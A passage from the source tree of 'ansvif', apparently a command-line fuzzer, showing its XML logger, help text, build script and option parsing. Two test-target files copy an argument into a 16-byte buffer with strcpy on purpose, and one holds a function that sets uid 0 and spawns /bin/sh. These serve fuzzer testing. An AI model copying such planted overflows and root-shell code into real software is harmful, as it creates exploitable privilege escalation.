| protected: 14 | std::deque<T> c; // container for the elements 15 | 16 | public: 17 | /* exception class for pop() and top() with empty stack 18 | */ 19 | class ReadEmptyStack : public std::exception { 20 | public: 21 | virtual const char* what() const throw() { 22 | return "read empty stack"; 23 | } 24 | }; 25 | 26 | // number of elements 27 | typename std::deque<T>::size_type size() const { 28 | return c.size(); 29 | } 30 | 31 | // is stack empty? 32 | bool empty() const { 33 | return c.empty(); 34 | } 35 | 36 | // push element into the stack 37 | void push (const T& elem) { 38 | c.push_back(elem); 39 | } 40 | 41 | // pop element out of the stack and return its value 42 | T pop () { 43 | if (c.empty()) { 44 | throw ReadEmptyStack(); 45 | } 46 | T elem(c.back()); 47 | c.pop_back(); 48 | return elem; 49 | } 50 | 51 | // return value of next element 52 | T& top () { 53 | if (c.empty()) { 54 | throw ReadEmptyStack(); 55 | } 56 | return c.back(); 57 | } 58 | }; 59 | 60 | #endif /* STACK_HPP */ 61 | -------------------------------------------------------------------------------- /include/xmlwriter/xml_writer.hpp: -------------------------------------------------------------------------------- 1 | #ifndef XML_WRITER_HPP 2 | # define XML_WRITER_HPP 3 | 4 | # define HEADER "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n" 5 | # define INDENT " " 6 | # define NEWLINE "\n" 7 | 8 | #include <string.h> 9 | #ifdef __NOTANDROID__ 10 | #include "include/stack.h" 11 | #endif 12 | #ifdef __ANDROID__ 13 | #include "../stack.h" 14 | #endif 15 | #ifdef __WIN32 16 | #include "../stack.h" 17 | #endif 18 | #include <iostream> 19 | 20 | class Writer 21 | { 22 | public: 23 | 24 | Writer(std::ostream& os) : os(os), tag_open(false), new_line(true) {os << HEADER;} 25 | ~Writer() {} 26 | 27 | Writer& openElt(const char* tag) { 28 | this->closeTag(); 29 | if (elt_stack.size() > 0) 30 | os << NEWLINE; 31 | this->indent(); 32 | this->os << "<" << tag; 33 | elt_stack.push(tag); 34 | tag_open = true; 35 | new_line = false; 36 | return *this; 37 | } 38 | 39 | Writer& closeElt() { 40 | this->closeTag(); 41 | std::string elt = elt_stack.top(); 42 | this->elt_stack.pop(); 43 | if (new_line) 44 | { 45 | os << NEWLINE; 46 | this->indent(); 47 | } 48 | new_line = true; 49 | this->os << "</" << elt << ">"; 50 | return *this; 51 | } 52 | 53 | Writer& closeAll() { 54 | while (elt_stack.size()) 55 | this->closeElt(); 56 | return *this; 57 | } 58 | 59 | Writer& attr(const char* key, const char* val) { 60 | this->os << " " << key << "=\""; 61 | this->write_escape(val); 62 | this->os << "\""; 63 | return *this; 64 | } 65 | 66 | Writer& attr(const char* key, std::string val) { 67 | return attr(key, val.c_str()); 68 | } 69 | 70 | Writer& content(const char* val) { 71 | this->closeTag(); 72 | this->write_escape(val); 73 | return *this; 74 | } 75 | 76 | private: 77 | std::ostream& os; 78 | bool tag_open; 79 | bool new_line; 80 | stack<std::string> elt_stack; 81 | 82 | inline void closeTag() { 83 | if (tag_open) 84 | { 85 | this->os << ">"; 86 | tag_open = false; 87 | } 88 | } 89 | 90 | inline void indent() { 91 | int elt_stack_size = elt_stack.size(); 92 | for (int i = 0; i < elt_stack_size; i++) 93 | os << (INDENT); 94 | } 95 | 96 | inline void write_escape(const char* str) { 97 | for (; *str; str++) 98 | switch (*str) { 99 | case '&': os << "&amp;"; break; 100 | case '<': os << "&lt;"; break; 101 | case '>': os << "&gt;"; break; 102 | case '\'': os << "&apos;"; break; 103 | case '"': os << "&quot;"; break; 104 | default: os.put(*str); break; 105 | } 106 | } 107 | }; 108 | 109 | #endif /* !XML_WRITER_HPP */ 110 | -------------------------------------------------------------------------------- /make_win.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | FOR /F "tokens=* USEBACKQ" %%F IN (`dir "C:\Program Files\mingw-w64\*posix-seh*" /b /S`) DO ( 3 | SET mingw=%%F 4 | ) 5 | set PATH=%mingw%\mingw64\bin;%PATH% 6 | rem echo %PATH% 7 | @echo on 8 | "windres.exe" bin\win\metadata.rc -O coff -o metadata.res 9 | "g++.exe" src/remove_chars.cpp src/bin2hex.cpp src/write_file.cpp src/popen2.cpp src/main.cpp src/help.cpp src/file_check.cpp src/to_int.cpp src/match_fault.cpp src/sys_string.cpp src/man_read.cpp src/randomizer.cpp src/trash.cpp src/templates.cpp src/reaper.cpp src/log.cpp metadata.res src/version.h -I./ -I./include -std=c++11 -lstdc++ -lpthread -O2 -o ansvif.exe -static -static-libgcc -static-libstdc++ 10 | "gcc.exe" src/win/printf.c -o printf.exe metadata.res 11 | -------------------------------------------------------------------------------- /man/ansvif.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/man/ansvif.1.gz -------------------------------------------------------------------------------- /man/ansvif_gtk.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/man/ansvif_gtk.1.gz -------------------------------------------------------------------------------- /man/find_suid.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/man/find_suid.1.gz -------------------------------------------------------------------------------- /src/.deps/.dirstamp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/src/.deps/.dirstamp -------------------------------------------------------------------------------- /src/.dirstamp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/src/.dirstamp -------------------------------------------------------------------------------- /src/bin2hex.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | */ 6 | 7 | // __ _ _ __ ___ __ ____ ____ 8 | // / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | // ( O ) (/ ( (_ / \___ \ )( 10 | // \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | 12 | #include <iomanip> 13 | #include <iterator> 14 | #include <sstream> 15 | #include <string> 16 | 17 | std::string binstr_to_hex(std::string bin_str) { 18 | std::stringstream hex_out; 19 | /* initialize our string to put it in with a filler of 20 | * zero and upercase hexadecimal with a width of 2 21 | */ 22 | std::string hexxy; 23 | hex_out << std::setw(2) << std::setfill('0') << std::hex << std::uppercase; 24 | #ifdef _WIN32 25 | std::copy(bin_str.begin(), bin_str.end(), 26 | std::ostream_iterator<unsigned int>(hex_out, "\\x")); 27 | if (hex_out.str() != "") { 28 | /* if we don't have anything in the buffer throw 29 | * a space in 30 | */ 31 | hexxy = hex_out.str() + "20"; 32 | } 33 | hexxy = "\\x" + hexxy; 34 | if (hexxy == "\\x20\\x20") { 35 | return ""; 36 | } else { 37 | /* return to be fed into printf */ 38 | return (hexxy); 39 | } 40 | #endif 41 | #ifdef __linux 42 | hexxy = hex_out.str(); 43 | std::copy(bin_str.begin(), bin_str.end(), 44 | std::ostream_iterator<int>(hex_out, "\\\\x")); 45 | // if (hex_out.str() != "") { 46 | // hexxy = hex_out.str() + "20"; 47 | // } 48 | /* make sure that it begins in \\x for output */ 49 | // hexxy = "\\\\x" + hexxy; 50 | /* if the output is only spaces then return nothing */ 51 | // if (hexxy == "\\\\x20\\\\x20") { 52 | // return (""); 53 | // } 54 | /* return to sys_string in hex */ 55 | return (hex_out.str()); 56 | #endif 57 | } 58 | 59 | std::string binstr_to_hex_pc(std::string bin_str) { 60 | /* initialize the hex to go out */ 61 | std::stringstream hex_out; 62 | /* initialize our string to put it in with a filler of 63 | * zero and upercase hexadecimal with a width of 2 64 | */ 65 | std::string hexxy; 66 | hex_out << std::setw(2) << std::setfill('0') << std::hex << std::uppercase; 67 | #ifdef _WIN32 68 | /* for each of them put a % in front for the output to printf 69 | * if we don't have anything in the buffer then we'll just put 70 | * a space 71 | */ 72 | std::copy(bin_str.begin(), bin_str.end(), 73 | std::ostream_iterator<unsigned int>(hex_out, "%")); 74 | if (hex_out.str() != "") { 75 | hexxy = hex_out.str() + "20"; 76 | } 77 | hexxy = "%" + hexxy; 78 | if (hexxy == "%20%20") { 79 | return (""); 80 | } else { 81 | /* return the hex */ 82 | return (hexxy); 83 | } 84 | #endif 85 | #ifdef __linux 86 | /* for each character put the % infront for the output of 87 | * printf if we don't have anything in the buffer we'll 88 | * put a space 89 | */ 90 | std::copy(bin_str.begin(), bin_str.end(), 91 | std::ostream_iterator<unsigned int>(hex_out, "%")); 92 | if (hex_out.str() != "") { 93 | hexxy = hex_out.str() + "20"; 94 | } 95 | /* make sure it starts with a % in this case */ 96 | hexxy = "%" + hexxy; 97 | /* if nothing is in it but hex spaces then we will 98 | * return nothing 99 | */ 100 | /* 101 | if (hexxy.substr(0, 3) == "%20") { 102 | return (""); 103 | } 104 | */ 105 | /* if there is stuff in the variable the return sys_string 106 | * in hex 107 | */ 108 | return (hexxy); 109 | #endif 110 | return (""); 111 | } 112 | -------------------------------------------------------------------------------- /src/buffer_overflow.c: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | * 6 | * 7 | * __ _ _ __ ___ __ ____ ____ 8 | * / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | * ( O ) (/ ( (_ / \___ \ )( 10 | * \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | */ 12 | 13 | #include <stdio.h> 14 | #include <stdlib.h> 15 | #include <string.h> 16 | #include <sys/types.h> 17 | void func(char **argv) { 18 | printf("running strcpy...\n"); 19 | char arr[16]; 20 | strcpy(arr, argv[2]); 21 | return; 22 | } 23 | void spawnme() { 24 | setuid(0); 25 | int stat = system("/bin/sh"); 26 | } 27 | int main(int argc, char *argv[]) { 28 | int blah = 0; 29 | if (argc != 3) { 30 | printf("2 args yo.\n"); 31 | exit(1); 32 | } 33 | if (argc == 3) { 34 | func(argv); 35 | } 36 | if (blah == 1) 37 | spawnme(); 38 | else 39 | printf("wut?\n"); 40 | exit(1); 41 | } 42 | -------------------------------------------------------------------------------- /src/file_check.cpp: -------------------------------------------------------------------------------- 1 | #include <string> 2 | #include <sys/stat.h> 3 | 4 | bool file_exists(const std::string &filen) { 5 | struct stat buf; 6 | /* return if the file exists or not */ 7 | return (stat(filen.c_str(), &buf) == 0); 8 | } 9 | 10 | -------------------------------------------------------------------------------- /src/generic_buffer_overflow.c: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | * 6 | * 7 | * __ _ _ __ ___ __ ____ ____ 8 | * / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | * ( O ) (/ ( (_ / \___ \ )( 10 | * \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | */ 12 | 13 | #include <stdio.h> 14 | #include <stdlib.h> 15 | #include <string.h> 16 | #include <sys/types.h> 17 | void func(char **argv) { 18 | printf("running strcpy...\n"); 19 | char arr[16]; 20 | strcpy(arr, argv[1]); 21 | } 22 | int main(int argc, char *argv[]) { 23 | if(argc == 2) { 24 | func(argv); 25 | } 26 | return(0); 27 | } 28 | -------------------------------------------------------------------------------- /src/help.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | */ 6 | 7 | // __ _ _ __ ___ __ ____ ____ 8 | // / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | // ( O ) (/ ( (_ / \___ \ )( 10 | // \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | 12 | #ifdef __NOTANDROID__ 13 | #include "src/version.h" 14 | #ifdef __ANDROID__ 15 | #include "../version.h" 16 | #endif 17 | #endif 18 | #ifdef _WIN32 19 | #include "version.h" 20 | #endif 21 | #include <cstdlib> 22 | #include <iostream> 23 | #include <stdio.h> 24 | #include <string> 25 | #include "version.h" 26 | 27 | void help_me(std::string mr_me) { 28 | /* print all the help shit to STDOUT */ 29 | std::cout 30 | << "ansvif v" << ver << " -- A Not So Very Intelligent Fuzzer" 31 | << std::endl 32 | << "Usage:" << std::endl 33 | << " " << mr_me << " -t template -c ./faulty -b 2048" << std::endl 34 | << "Options:" << std::endl 35 | << " -t [file] This file should hold line by line command arguments." 36 | << std::endl 37 | << " as shown in the example file." << std::endl 38 | << " -e [file] This file should hold line by line environment " 39 | "variables." 40 | << std::endl 41 | << " as shown in the example file. You can" << std::endl 42 | << " usually get these by doing something like:" << std::endl 43 | << " $ strings /bin/mount | perl -ne 'print if /[A-Z]=$/' > " 44 | "mount_envs" 45 | << std::endl 46 | << " -c [path] Specifies the command path." << std::endl 47 | #ifdef __linux 48 | << " -p [integer] Specifies the manpage location (as an integer, usually " 49 | "1 or 8)." 50 | << std::endl 51 | << " -m [command] Specifies the commands manpage." << std::endl 52 | #endif 53 | << " -D Dump what we can out of the manpage to stdout." 54 | << std::endl 55 | << " -f [integer] Number of threads to use. Default is 2." << std::endl 56 | << " -b [integer] Specifies the buffer size to fuzz with." << std::endl 57 | << " 256-2048 Is usually sufficient." << std::endl 58 | << " -r Use only random data." << std::endl 59 | << " -z Randomize buffer size from 1 to specified by the -b " 60 | "option." 61 | << std::endl 62 | << " -s \"@#^$CE\" Characters to omit from randomization. Default " 63 | "omitted" 64 | << std::endl 65 | << " characters are: <>\\n |&\[]\()\{}:;\\ and mandatory " 66 | "omitted" 67 | << std::endl 68 | << " characters are: >\\n." 69 | << std::endl 70 | << " -o [file] Log to this file." << std::endl 71 | << " -x [file] Other opts to put in, such as usernames, etc." 72 | << std::endl 73 | << " -S \",\" Some seperator besides 'space' between opts, such as " 74 | "',:-' etc." 75 | << std::endl 76 | << " -L Privilege changing not implimented in Windows yet. " 77 | "Defaults" 78 | << std::endl 79 | << " nobody." << std::endl 80 | << " -A \"foo\" Always put this string after the command." 81 | << std::endl 82 | << " -B \"bar\" Always put this string before the command." 83 | << std::endl 84 | << " -F [file] A file with junk to be fuzzed with whole." << std::endl 85 | << " -n Never use random data in the fuzz." << std::endl 86 | << " -C \"13\" Non default crash recognition error codes." 87 | << std::endl 88 | #ifdef _WIN32 89 | << " Defaults are -1073741819, -1073740791, -1073741571, and" 90 | << std::endl 91 | << " -532459699." 92 | #endif 93 | #ifdef __linux 94 | << " Defaults are 132, 136, 139, 135, 134, and 159." 95 | #endif 96 | << std::endl 97 | << " -W [integer] Thread timeout." << std::endl 98 | #ifdef _WIN32 99 | << " -V Valgrind is not supported under Windows." << std::endl 100 | #endif 101 | #ifdef __linux 102 | << " -V Fuzz in conjunction with Valgrind." << std::endl 103 | #endif 104 | << " -1 Try to induce a crash once, and if a crash is not " 105 | "induced," 106 | << std::endl 107 | << " throw error code 64." << std::endl 108 | << " -P Use % to represent binary in fuzz." << std::endl 109 | << " -M Max arguments to use in the fuzz." << std::endl 110 | << " -y Short for -b 0 and usually only useful with -A or -B" 111 | << std::endl 112 | << " -K Keep going after a crash." << std::endl 113 | << " -E \"cmd\" A command to be run before the fuzzed program." << std::endl 114 | << " -R \"ls\" Always run this command after the fuzz." << std::endl 115 | << " -N \"prog\" Shorthand for -R \"pkill prog\"" << std::endl 116 | << " -0 No NULL in fuzz." << std::endl 117 | << " -v Be verbose." << std::endl 118 | << " -d Debug data." << std::endl 119 | << " -i Prints version information." << std::endl; 120 | /* exit with an error because we didn't do anything but 121 | * print a help page 122 | */ 123 | exit(1); 124 | } 125 | -------------------------------------------------------------------------------- /src/linux/.deps/.dirstamp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/src/linux/.deps/.dirstamp -------------------------------------------------------------------------------- /src/linux/.dirstamp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/src/linux/.dirstamp -------------------------------------------------------------------------------- /src/log.cpp: -------------------------------------------------------------------------------- 1 | #ifdef __NOTANDROID__ 2 | #include "src/version.h" 3 | #endif 4 | #ifdef __ANDROID__ 5 | #include "version.h" 6 | #endif 7 | #ifdef _WIN32 8 | #include "version.h" 9 | #endif 10 | #ifdef __linux__ 11 | #include "version.h" 12 | #endif 13 | #include "../include/stack.h" 14 | #include "../include/xmlwriter/xml_writer.hpp" 15 | #include <cstdlib> 16 | #include <cstring> 17 | #include <fstream> 18 | #include <sstream> 19 | #include <iostream> 20 | #include <stdio.h> 21 | #include <string.h> 22 | #include <unistd.h> 23 | 24 | void log_head(std::string write_file_n, std::string path_str, 25 | std::string cmd_output, std::string out_str_p, 26 | std::string out_str, int pid) { 27 | /* all this xml stuff is for logging */ 28 | #ifdef __unix__ 29 | std::ostringstream pid_as_s; 30 | pid_as_s << pid; 31 | std::string output_logfile_pid = 32 | write_file_n + ".output." + pid_as_s.str().c_str() + ".ansvif.log"; 33 | std::string crash_logfile_pid = 34 | write_file_n + ".crash." + pid_as_s.str().c_str() + ".ansvif.log"; 35 | 36 | #endif 37 | std::ofstream xml_output; 38 | xml_output.open(write_file_n + ".crash.ansvif.log"); 39 | Writer writer(xml_output); 40 | writer.openElt("ansvif"); 41 | writer.openElt("Version") 42 | .attr("ver", "The ansvif version to fuzzing with") 43 | .content(ver.c_str()) 44 | .closeElt(); 45 | writer.openElt("Program") 46 | .attr("path", "Path of the file fuzzed") 47 | .content(path_str.c_str()) 48 | .closeElt(); 49 | #ifdef __unix__ 50 | writer.openElt("Process") 51 | .attr("PID", "The process ID of the crashed program") 52 | .content(pid_as_s.str().c_str()) 53 | .closeElt(); 54 | ; 55 | #endif 56 | } 57 | 58 | void log_tail(std::string write_file_n, std::string junk_file_of_args, 59 | std::string output_logfile, std::string crash_logfile, 60 | std::string cmd_output, std::string out_str_p, 61 | std::string out_str, int pid) { 62 | /* since we crashed we're going to finish writing to the 63 | *xml file 64 | */ 65 | #ifdef __unix__ 66 | std::ostringstream pid_as_s; 67 | pid_as_s << pid; 68 | std::string output_logfile_pid = 69 | write_file_n + ".output." + pid_as_s.str().c_str() + ".ansvif.log"; 70 | std::string crash_logfile_pid = 71 | write_file_n + ".crash." + pid_as_s.str().c_str() + ".ansvif.log"; 72 | #endif 73 | std::ofstream xml_output; 74 | xml_output.open(write_file_n + ".crash.ansvif.log"); 75 | Writer writer(xml_output); 76 | writer.openElt("Crash"); 77 | writer.openElt("Exit Code") 78 | .attr("code", "The programs exit code") 79 | .content(cmd_output.c_str()) 80 | .closeElt(); 81 | writer.openElt("Command") 82 | .attr("run", "What the command crashed with") 83 | .content(out_str_p.c_str()) 84 | .closeElt(); 85 | writer.openElt("Command") 86 | .attr("run_plain", "What the command crashed with (plaintext)") 87 | .content(out_str.c_str()) 88 | .closeElt(); 89 | writer.openElt("File data") 90 | .attr("file", "File data used left here") 91 | .content(junk_file_of_args.c_str()) 92 | .closeAll(); 93 | xml_output.close(); 94 | std::cout << "Crash logged." << std::endl; 95 | /* move the logged files for pid */ 96 | #ifdef __unix__ 97 | rename(output_logfile.c_str(), output_logfile_pid.c_str()); 98 | rename(crash_logfile.c_str(), crash_logfile_pid.c_str()); 99 | #endif 100 | } 101 | 102 | void log_hang(std::string write_file_n, std::string out_str_p, 103 | std::string out_str, std::string junk_file_of_args, int pid) { 104 | #ifdef __unix__ 105 | std::ostringstream pid_as_s; 106 | pid_as_s << pid; 107 | std::string output_logfile_pid = 108 | write_file_n + ".output." + pid_as_s.str().c_str() + ".ansvif.log"; 109 | #endif 110 | std::ofstream xml_output; 111 | #ifdef __unix__ 112 | xml_output.open(output_logfile_pid.c_str()); 113 | #endif 114 | #ifdef _WIN32 115 | std::string output_logfile = 116 | write_file_n + ".output." + ".ansvif.log"; 117 | xml_output.open(output_logfile.c_str()); 118 | #endif 119 | Writer writer(xml_output); 120 | writer.openElt("Command") 121 | .attr("run", "What the command hung with") 122 | .content(out_str_p.c_str()) 123 | .closeElt(); 124 | writer.openElt("Command") 125 | .attr("run_plain", "What the command hung with (plaintext)") 126 | .content(out_str.c_str()) 127 | .closeElt(); 128 | writer.openElt("File data") 129 | .attr("file", "File data used left here") 130 | .content(junk_file_of_args.c_str()) 131 | .closeAll(); 132 | xml_output.close(); 133 | } 134 | -------------------------------------------------------------------------------- /src/main.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | */ 6 | 7 | // __ _ _ __ ___ __ ____ ____ 8 | // / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | // ( O ) (/ ( (_ / \___ \ )( 10 | // \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | 12 | #include <cstdlib> 13 | #include <fstream> 14 | #include <iostream> 15 | #include <regex> 16 | #include "signal.h" 17 | #include "stdio.h" 18 | #include "sys/stat.h" 19 | #ifdef __unix__ 20 | #include <sys/wait.h> 21 | #endif 22 | #ifdef __ANDROID__ 23 | #include "version.h" 24 | #endif 25 | #ifdef __NOTANDROID__ 26 | #include "src/version.h" 27 | #endif 28 | #ifdef _WIN32 29 | #include "version.h" 30 | #endif 31 | #include "sys/types.h" 32 | #include <thread> 33 | #include "unistd.h" 34 | #include <vector> 35 | 36 | int toint(std::string ints, std::string my_prog); 37 | void help_me(std::string mr_me); 38 | bool file_exists(const std::string &filen); 39 | std::vector<std::string> get_flags_man(std::string man_page, 40 | std::string man_loc, bool verbose, 41 | bool debug, bool dump_opts); 42 | void oxagast(); 43 | 44 | struct Options { 45 | public: 46 | int static_args; 47 | std::vector<std::string> opts; 48 | std::vector<std::string> spec_env; 49 | std::vector<std::string> opt_other; 50 | std::string t_timeout; 51 | std::string strip_shell; 52 | std::string u_strip_shell; 53 | std::string write_file_n; 54 | std::string path_str; 55 | std::string other_sep; 56 | std::string low_lvl_user; 57 | std::string junk_file_of_args; 58 | std::string always_arg_before; 59 | std::string always_arg_after; 60 | std::string fault_code; 61 | bool rand_all; 62 | bool never_rand; 63 | bool valgrind; 64 | bool percent_sign; 65 | } options; 66 | 67 | struct Debug { 68 | public: 69 | bool debug; 70 | bool verbose; 71 | bool dump_opts; 72 | } debugo; 73 | 74 | struct BuffCont { 75 | public: 76 | int buf_size_int; 77 | bool rand_buf; 78 | } buffercontrol; 79 | 80 | struct RunCommands { 81 | public: 82 | std::string run_command; 83 | std::string before_command; 84 | std::string prog_name; 85 | bool write_pipe; 86 | } runcoms; 87 | 88 | struct Monopoly { 89 | public: 90 | bool keep_going; 91 | bool single_try; 92 | } dontpassgo; 93 | 94 | void match_seg(Options, RunCommands, Monopoly, BuffCont, Debug); 95 | std::vector<std::string> get_flags_template(std::string filename, bool verbose, 96 | bool debug); 97 | std::vector<std::string> get_other(std::string filename, bool verbose, 98 | bool debug); 99 | void write_seg(std::string filename, std::string seg_line); 100 | 101 | /* globals to be passed to sig_handler because its easier this way */ 102 | std::string write_file_n, junk_file_of_args; 103 | std::string ver = "1.11"; /* ansvif version */ 104 | void sig_handler(int sig) { 105 | /* flush the screen buffer then sleep before printing 106 | * the message about killing threads 107 | */ 108 | std::cout.flush(); 109 | sleep(1); 110 | std::cout << std::endl << "Cought ctrl+c, Killing threads..." << std::endl; 111 | std::cout << "Cleaning up..." << std::endl; 112 | /* append the crash logs to their respective strings so that we 113 | * can clean up after ourselves if there was no crash 114 | */ 115 | std::string crash_file = write_file_n + ".crash.ansvif.log"; 116 | std::string output_file = write_file_n + ".output.ansvif.log"; 117 | /* clean up the junk files */ 118 | unlink(junk_file_of_args.c_str()); 119 | unlink(crash_file.c_str()); 120 | unlink(output_file.c_str()); 121 | /* exit our program as the user wanted to */ 122 | std::cout << "Exiting cleanly..." << std::endl; 123 | exit(0); 124 | } 125 | 126 | void version() { 127 | std::cout << "ansvif v" << ver << " -- A Not So Very Intelligent Fuzzer" 128 | << std::endl; 129 | exit(0); 130 | } 131 | 132 | int main(int argc, char *argv[]) { // initialize our main 133 | /* initialize all our variables for startup! */ 134 | /* how many options? */ 135 | int opt; 136 | int thread_count_def = 2; 137 | /* int thread_timeout_def = 3; */ 138 | 139 | Options options = { 140 | static_args : 4, 141 | opts : {}, 142 | spec_env : {}, 143 | opt_other : {}, 144 | t_timeout : "3", 145 | #ifdef __NOTANDROID__ 146 | strip_shell : "\"`<>\n|&\[]\()\{}:;$'", 147 | #endif 148 | #ifdef _WIN32 149 | strip_shell : "[]:|<>+;=.?\n\r\\0", 150 | #endif 151 | #ifdef __ANDROID__ 152 | strip_shell : "\"`<>\n|&\[]\()\{}:;$'", 153 | #endif 154 | u_strip_shell : "", 155 | write_file_n : "", 156 | path_str : "", 157 | other_sep : "", 158 | low_lvl_user : "nobody", 159 | junk_file_of_args : "", 160 | always_arg_before : "", 161 | always_arg_after : "", 162 | #ifdef __NOTANDROID__ 163 | fault_code : "134", 164 | #endif 165 | #ifdef __ANDROID__ 166 | fault_code : "134", 167 | #endif 168 | #ifdef _WIN32 169 | fault_code : "-1073741819", 170 | #endif 171 | rand_all : false, 172 | never_rand : false, 173 | valgrind : false, 174 | percent_sign : false, 175 | }; 176 | 177 | Debug debugo { 178 | debug : false, 179 | verbose : false, 180 | dump_opts : false 181 | }; 182 | 183 | BuffCont buffercontrol { 184 | buf_size_int : -1, 185 | rand_buf : false 186 | }; 187 | 188 | Monopoly dontpassgo { 189 | keep_going : false, 190 | single_try : false 191 | }; 192 | 193 | RunCommands runcoms { // I always wanted a fucking monocole. 194 | run_command : "", 195 | before_command : "", 196 | prog_name : "" 197 | }; 198 | 199 | /* first off we're going to start the signal handler incase they 200 | * do ctrl+c or something 201 | */ 202 | signal(SIGINT, sig_handler); 203 | std::string buf_size, template_file, man_loc, man_page, num_threads; 204 | /* now we can start grabbing all the options! */ 205 | while ((opt = getopt( 206 | argc, argv, 207 | "m:p:t:e:c:f:o:b:s:x:R:A:F:E:S:L:W:B:M:C:N:way1hrzvdDnVPKi0")) != 208 | -1) { 209 | switch (opt) { 210 | case 'v': 211 | debugo.verbose = true; 212 | break; 213 | case 'd': 214 | debugo.debug = true; 215 | debugo.verbose = true; 216 | break; 217 | case 't': 218 | template_file = optarg; 219 | break; 220 | case 'a': 221 | oxagast(); 222 | break; 223 | case 'c': 224 | options.path_str = optarg; 225 | break; 226 | case 'b': 227 | buf_size = optarg; 228 | break; 229 | case 'e': 230 | options.spec_env = 231 | get_flags_template(optarg, debugo.verbose, debugo.debug); 232 | break; 233 | case 'p': 234 | man_loc = optarg; 235 | break; 236 | case 'm': 237 | man_page = optarg; 238 | break; 239 | case 'f': 240 | num_threads = optarg; 241 | break; 242 | case 'o': 243 | options.write_file_n = optarg; 244 | break; 245 | case 'h': 246 | help_me(argv[0]); 247 | break; 248 | case 'r': 249 | options.rand_all = true; 250 | break; 251 | case 'z': 252 | buffercontrol.rand_buf = true; 253 | break; 254 | case 's': 255 | options.u_strip_shell = optarg; 256 | break; 257 | case 'x': 258 | options.opt_other = get_other(optarg, debugo.verbose, debugo.debug); 259 | break; 260 | case 'D': 261 | debugo.dump_opts = true; 262 | break; 263 | case 'S': 264 | options.other_sep = optarg; 265 | break; 266 | case 'L': 267 | options.low_lvl_user = optarg; 268 | break; 269 | case 'F': 270 | options.junk_file_of_args = optarg; 271 | break; 272 | case 'A': 273 | options.always_arg_after = optarg; 274 | break; 275 | case 'B': 276 | options.always_arg_before = optarg; 277 | break; 278 | case 'n': 279 | options.never_rand = true; 280 | break; 281 | case 'R': 282 | runcoms.run_command = optarg; 283 | break; 284 | case 'W': 285 | options.t_timeout = optarg; 286 | break; 287 | case 'C': 288 | options.fault_code = optarg; 289 | break; 290 | case 'V': 291 | options.valgrind = true; 292 | break; 293 | case '1': 294 | dontpassgo.single_try = true; 295 | break; 296 | case 'P': 297 | options.percent_sign = true; 298 | break; 299 | case 'M': 300 | options.static_args = toint(optarg, argv[0]); 301 | break; 302 | case 'y': 303 | buffercontrol.buf_size_int = 0; 304 | break; 305 | case 'K': 306 | dontpassgo.keep_going = true; 307 | break; 308 | case 'E': 309 | runcoms.before_command = optarg; 310 | break; 311 | case 'w': 312 | runcoms.write_pipe = true; 313 | break; 314 | case 'i': 315 | version(); 316 | break; 317 | case '0': 318 | options.strip_shell = options.strip_shell + "\\x00"; 319 | break; 320 | case 'N': 321 | runcoms.prog_name = optarg; 322 | break; 323 | default: 324 | help_me(argv[0]); 325 | } 326 | } 327 | #ifdef __ANDROID__ 328 | if (file_exists("/sdcard/ansvif/ansvif.crashed") == true) { 329 | unlink("/sdcard/ansvif/ansvif.crashed"); 330 | } 331 | #endif 332 | #ifdef __NOTANDROID__ 333 | if (file_exists("/tmp/ansvif.crashed") == true) { 334 | unlink("/tmp/ansvif.crashed"); 335 | } 336 | #endif 337 | /* always strip a new line no matter what the user says */ 338 | options.strip_shell = options.u_strip_shell + ">\n"; 339 | if ((man_page != "") && (template_file == "")) { 340 | /* because we're getting stuff from the manpage */ 341 | options.opts = 342 | get_flags_man(man_page, man_loc, debugo.verbose, 343 | debugo.debug, debugo.dump_opts); 344 | } else if ((man_page == "") && (template_file != "")) { 345 | /* we're getting stuff from a template */ 346 | options.opts = get_flags_template(template_file, debugo.verbose, 347 | debugo.debug); 348 | } else if ((man_page != "") && (template_file != "")) { 349 | /* send them to help because you can't have a manpage and 350 | * a template at the same time 351 | */ 352 | std::cerr << "Don't specifiy a manpage and template at the same time" 353 | << std::endl; 354 | help_me(argv[0]); 355 | } else if ((man_page == "") && (template_file == "")) { 356 | /* can't fuzz if we don't have a template or manpage as 357 | * a starting point, if you want nothing just touch a file 358 | * and use it as a template 359 | */ 360 | std::cerr << "You didn't specy a manpage or template." << std::endl; 361 | help_me(argv[0]); 362 | } 363 | if (file_exists(options.path_str) == false) { 364 | /* if they didn't specify a command path then error out */ 365 | std::cerr << "No command at path to fuzz..." << std::endl; 